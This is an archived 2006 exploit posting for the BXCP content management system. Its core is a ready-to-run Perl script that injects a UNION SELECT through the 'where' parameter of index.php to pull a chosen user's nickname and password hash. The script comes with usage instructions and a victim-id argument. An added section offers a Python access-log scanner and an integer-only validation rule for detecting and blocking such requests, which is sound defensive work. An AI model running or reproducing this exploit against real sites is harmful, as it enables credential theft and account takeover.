2006-07-02 BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit
Rated as: Moderate Risk

#!/usr/bin/perl

use IO::Socket;

print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)\n"; }

$get =
"http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .=
"SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;

print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp",
                              PeerAddr=>"$webpage",
                              PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~ /([0-9a-f]{32})\n/) {
     print "~ hash: $1\n";
     last;
  }
}

close($sock);
securitydot.net - 2006-07-02
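
A detection-side check for the request this exploit sends, added here as an example (it is not part of the original posting or the exploit author's code): it scans web access log lines for requests to index.php with mod=files whose where parameter carries a UNION SELECT or is not a plain integer. The log lines are constructed samples in combined log format, and treating legitimate where values as non-negative integers is an assumption not stated on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (documentation IP ranges, made-up host).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jul/2006:10:00:01 +0000] "GET /index.php?mod=files&action=view&where=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Jul/2006:10:02:13 +0000] "GET http://cms.example/index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0+FROM+{pre}_users+WHERE+users_id=1 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Jul/2006:10:02:20 +0000] "GET /index.php?mod=files&action=view&where=-1%20%55NION%20SELECT%201 HTTP/1.1" 200 4711 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [02/Jul/2006:10:05:44 +0000] "GET /index.php?mod=files&action=view&where=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Jul/2006:10:06:00 +0000] "GET /index.php?mod=news HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
]

# Client address and request target from one combined-format log entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def classify(line):
    """Return (client_ip, verdict) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # urlsplit copes with both origin-form and absolute-form request targets.
    url = urlsplit(m.group("target"))
    # parse_qs percent-decodes and maps '+' to a space, so encoded variants
    # such as %55NION%20SELECT are normalised before the pattern is applied.
    params = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("index.php") or params.get("mod") != ["files"]:
        return None
    values = params.get("where", [])
    if any(UNION_RE.search(v) for v in values):
        return m.group("ip"), "union-select"
    # Assumption: a legitimate `where` value is a non-negative integer id.
    if any(not re.fullmatch(r"\d+", v) for v in values):
        return m.group("ip"), "non-numeric"
    return None


def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}")
```

The same integer-only rule for where, enforced in the application or at a filtering proxy, rejects the request before it reaches the query.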
